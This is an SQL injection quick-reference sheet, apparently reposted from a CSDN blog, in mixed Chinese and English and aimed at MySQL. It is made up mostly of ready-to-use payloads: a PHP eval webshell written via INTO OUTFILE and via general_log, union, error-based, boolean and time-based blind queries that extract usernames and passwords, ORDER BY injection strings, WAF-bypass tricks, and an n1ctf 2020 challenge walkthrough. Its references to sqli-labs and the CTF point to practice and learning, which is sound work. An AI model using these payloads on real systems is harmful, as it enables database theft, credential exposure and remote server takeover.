SQL injection quick reference manual (updated from time to time)

1 How to use

1.1 Echo data

  • System information collection: the most commonly used entries are marked with *

system_user()     系统用户名
user()            MYSQL用户名 
current_user()    当前用户名
session_user()    连接数据库的用户名
database()        当前数据库名(*)
schema()          当前数据库名
version()         当前数据库版本信息
@@version         数据库版本
load_file()       MYSQL读取本地文件(*)

@@datadir         Location of DB files
@@hostname        服务器主机名
@@basedir         MYSQL 安装路径
@@version_compile_os    操作系统

  • Database information collection

-- 查看数据库服务器上的数据库
SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA

-- 查看某个数据库里面的数据表
SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE table_schema ='数据库名'

-- 查看某个数据表里面的字段
--   默认当前数据库
SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name ='表名'
--  指定数据库
SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name ='表名' AND table_schema ='数据库名'

-- 查找字段名为id的数据库名和表名
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'id';

-- 权限列表
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges;

1.2 Getshell


-- outfile获取shell(union)
select '<?php @eval($_POST["pwd"]) ?>' into outfile '可访问web路径'

-- 开启日志获取shell(堆叠)
-- 查看配置
show variables like 'general%';
-- 开启日志
set global general_log = "ON";
-- 设置路径
set global general_log_file='/Users/littlechieh6/Documents/project/sqli-labs-php7/shell.php';
-- 数据写入
select '<?php phpinfo();?>';

2 Closing methods

2.1 Common types

Numeric, string and bracket types (closed on one side)


)
))
'
')
'))
"
")
"))
`
`)
`))
%
%)
%'
%')
%'))
%"
%")
%`
%`)
%`))

2.2 Closed on both sides

INSERT statements cannot echo results directly


?id=1'&&sleep(3)&&'1

2.3 ORDER BY type

Verify existence


# 升序排序
?sort=1 asc
# 降序排序
?sort=1 desc

# rand() 验证
?sort=rand(true)
?sort=rand(false)

# 延时验证
?sort=sleep(1)
?sort=(sleep(1))
?sort=1 and sleep(1)

Common usage

  • Error injection
  • Boolean injection
  • Delay injection

# 报错1
?sort=1+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username,password)+AS+CHAR),0x7e))+FROM+users+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)

# 报错2
?sort=1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)
?sort=1 procedure analyse(extractvalue(rand(),concat(0x3a,(SELECT+CONCAT_WS(':',username,password)+FROM+users limit 0,1))),1)

# 布尔注入
?sort=rand(left(database(),1)>'r')
?sort=rand(left(database(),1)>'s')

# 延时注入
?sort=rand(if(ascii(substr(database(),1,1))>114,1,sleep(1)))
?sort=rand(if(ascii(substr(database(),1,1))>115,1,sleep(1)))

# 写webshell
?sort=1 into outfile "/var/www/html/less46.txt"
?sort=1 into outfile "/Users/littlechieh6/Documents/project/sqli-labs-php7/less46.php" lines terminated by 0x3c3f70687020706870696e666f28293b3f3e

3 By echo type

3.1 Union injection


-- 判断字段数目
order by 1

-- 联合查询收集信息
union select 
-- 查询当前数据库
UNION SELECT 1,2,database() 
-- 查询所有数据库
UNION SELECT 1,2,group_concat(schema_name) from information_schema.schemata 
-- 查询表名
UNION SELECT 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() 
-- 查询列名
UNION SELECT 1,2,group_concat(column_name) from information_schema.columns where table_name='users' 
-- 查询字段值
UNION SELECT 1,2,group_concat(id,username,password) from users 

3.2 Error injection

Several common types of error injection:

  1. Data type overflow, such as BIGINT
  2. xpath syntax error
  3. concat + rand() + group by causing a duplicate primary key error
  4. Some features

Reference: A summary of MYSQL error injection

  • Data overflow

select ~0+1;
select exp(709);
select (select(!x-~0)from(select(select user())x)a);

  • xpath syntax error

select updatexml(1,concat(0x7e,(select @@version),0x7e),1);
select extractvalue(1,concat(0x7e,(select @@version),0x7e));

3.3 Boolean injection


1. 获取当前数据库长度
1" and length(database())>= 11 #()

2. 获取当前数据库名字
1" and substr(database(), 11, 1)="e" #

3. 获取库表的总数(还可以使用length)
1" and (select count(table_name) from information_schema.tables where table_schema=database()) >= 3 #

4. 获取库表的长度
1" and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1) >=0 #

5. 获取库表的名字
1" and substr((select table_name from information_schema.tables where table_schema=database() limit 2,1), {pos}, 1)="{c}" #

6. 获取库表的字段总数
1" and (select count(column_name) from information_schema.columns where table_schema=database() and table_name="the_cfg") >= 2 #

7. 获取库表的字段第2个长度
1" and length((select column_name from information_schema.columns where table_schema=database() and table_name="the_cfg" limit 0,1)) >= 0 #

8. 获取库表的字段第N个字段名
1" and substr((select column_name from information_schema.columns where table_schema=database() and table_name="the_cfg" limit 0,1), {pos}, 1)="{c}" #

9. 获取内容
1" and substr((select cfg_value from the_cfg limit 0,1), {pos}, 1)="{c}" #
Note: substr(str, pos, len) — pos is 1-based, so pos = 1 means starting from the first character.
limit pos, len — pos is 0-based; the following len is the number of rows.

3.4 Time-based blind injection


# SLEEP
select sleep(5);
# BENCHMARK
select benchmark(10000000,sha(1));
# 笛卡尔积
SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C;
# GET_LOCK
select get_lock('test',5);
# RLIKE
select rpad('a',4999999,'a') RLIKE concat(repeat('(a.*)+',30),'b');

4 WAF bypass

  1. Double write
  2. Special symbols, such as %0b
  3. Wide byte
  4. Closed at both ends

Practical example

The SQL statements used for the Web-SignIn challenge in n1ctf 2020. The error function used is the same as exp().


# 查询数据库名字
database()

# 查询数据库信息
SELECT concat(version(),0x3a,user(),0x3a,database(),0x3a,@@datadir,0x3a,@@version_compile_os)

# 查询文件读取权限
select group_concat(user,0x3a,file_priv) from mysql.user

# 查询当前用户
select user()

# 查询数据库版本
version()

# 查询表名的长度
select length(table_name) from information_schema.tables where table_schema='n1ctf_websign' limit 0,1) < 0

# 查询表名(修改后面的 limit)
select table_name from information_schema.tables where table_schema=DATABASE() limit 1,1

# 判断字段名(修改后面的 limit)
select column_name from information_schema.columns where table_schema=database() and table_name='n1key' limit 0,1

# 查询 ip 表。(边插入边查询,需要使用别名)
SELECT tid FROM (select ip tid from n1ip limit 0,1) AS tt

# 查询某个字段的数据(key 与数据库的关键词相冲突,需要使用别名)
select GROUP_CONCAT(id) FROM n1key
select group_concat(bb.key) from n1key bb
select group_concat(key) FROM (SELECT * FROM n1key) as a
select id from n1key limit 0,1
# 不使用字段名度值
SELECT a.2 FROM (SELECT 1, 2 UNION SELECT * FROM n1key

# 判断是否有数据
SELECT (SELECT key FROM n1key) IS NULL

# 查询文件
SELECT LOAD_FILE('/flag')

Appendix

Reference documents:

  1. Mysql injection-wiki
  2. sqli-labs (full walkthrough notes) - slug01sh
  3. Onebug.org | Security Line


Origin blog.csdn.net/qq_43085611/article/details/112788640